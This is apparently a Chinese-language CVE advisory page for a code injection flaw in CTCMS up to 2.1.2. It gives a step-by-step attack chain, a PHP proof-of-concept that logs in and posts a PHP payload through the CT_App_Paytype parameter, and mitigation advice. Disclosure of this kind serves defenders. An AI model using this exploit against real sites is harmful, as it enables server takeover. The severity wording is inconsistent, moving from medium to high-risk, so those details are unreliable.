CVE-2025-14729 | CTCMS up to 2.1.2 代码注入漏洞

漏洞信息

漏洞编号

CVE-2025-14729

漏洞类型

代码注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

CTCMS Content Management System

漏洞概述

CVE-2025-14729是CTCMS内容管理系统中的一个高危代码注入漏洞。该漏洞存在于系统的后端应用配置模块中，具体位于/ctcms/libs/Ct_App.php文件的Save函数。攻击者可以通过操纵CT_App_Paytype参数实现任意代码执行。由于该漏洞需要高权限用户才能利用，因此主要威胁对象为具有管理员或高级权限的内部用户。漏洞影响范围涵盖CTCMS 2.1.2及之前的所有版本。攻击者一旦成功利用此漏洞，可以在服务器上执行任意系统命令，获取敏感数据，甚至完全控制受影响的系统。该漏洞的利用代码已被公开披露，增加了实际被利用的风险。建议受影响的用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞属于代码注入（Code Injection）类型，存在于CTCMS的后端应用配置模块中。具体漏洞点位于/ctcms/libs/Ct_App.php文件的Save函数，该函数在处理用户输入的CT_App_Paytype参数时未进行充分的输入验证和过滤。攻击者可以通过构造恶意 payload，将任意PHP代码注入到服务器端并执行。攻击流程如下：首先攻击者需要获取高权限账户登录后台管理系统；然后导航至应用配置模块；接着在CT_App_Paytype参数中注入恶意PHP代码；最后触发Save函数时，注入的代码将被执行。由于漏洞涉及参数直接参与代码执行，攻击者可以实现命令执行、文件读写等高危操作。建议开发团队在所有用户输入点实施严格的输入验证，并避免使用危险函数如eval()处理用户可控数据。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的CTCMS版本，确认版本 <= 2.1.2

STEP 2

步骤2

获取访问权限：攻击者获取具有高权限的管理员账户凭据，或通过其他漏洞提升权限

STEP 3

步骤3

访问后门管理界面：登录CTCMS后台管理系统，导航至应用配置模块（Backend App Configuration Module）

STEP 4

步骤4

构造恶意Payload：在CT_App_Paytype参数中注入恶意PHP代码，如系统命令执行代码

STEP 5

步骤5

触发漏洞：提交包含恶意代码的表单请求，调用/ctcms/libs/Ct_App.php的Save函数

STEP 6

步骤6

代码执行：恶意代码被注入到服务器端并执行，攻击者获得服务器命令执行权限

STEP 7

步骤7

持久化控制：攻击者可写入后门、窃取数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-14729 PoC - CTCMS Code Injection
 * Affected: CTCMS Content Management System <= 2.1.2
 * Location: /ctcms/libs/Ct_App.php - Save function
 * Parameter: CT_App_Paytype
 * 
 * Usage: Modify the target URL and credentials, then run with PHP
 */

$target = "http://target.com/ctcms/";
$username = "admin";
$password = "admin123";

// Step 1: Login to get session cookie
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target . "index.php?c=login&a=check");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=" . urlencode($username) . "&password=" . urlencode($password));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Send malicious payload via CT_App_Paytype parameter
$payload = "<?php phpinfo(); ?>"; // Basic test payload
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target . "index.php?c=app&a=save");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "CT_App_Paytype=" . urlencode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
$response = curl_exec($ch);
curl_close($ch);

echo "Exploit sent. Check target for code execution.\n";
?>

影响范围

CTCMS Content Management System <= 2.1.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制后台管理功能的访问，仅允许受信任的IP地址访问；2）实施强密码策略和多因素认证保护管理员账户；3）在Web应用防火墙（WAF）中添加针对CT_App_Paytype参数的过滤规则，拦截可疑请求；4）禁用不必要的PHP函数，限制webshell的利用；5）加强日志监控，及时发现异常的管理操作行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14729
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14729
3 Details https://www.cvedetails.com/cve/CVE-2025-14729/
4 VulDB https://vuldb.com/cve/CVE-2025-14729
5 Link https://note-hxlab.wetolink.com/share/R3y6uiOuuYbA
6 Link https://vuldb.com/?ctiid.336486
7 Link https://vuldb.com/?id.336486
8 Link https://vuldb.com/?submit.707104
9 Link https://note-hxlab.wetolink.com/share/R3y6uiOuuYbA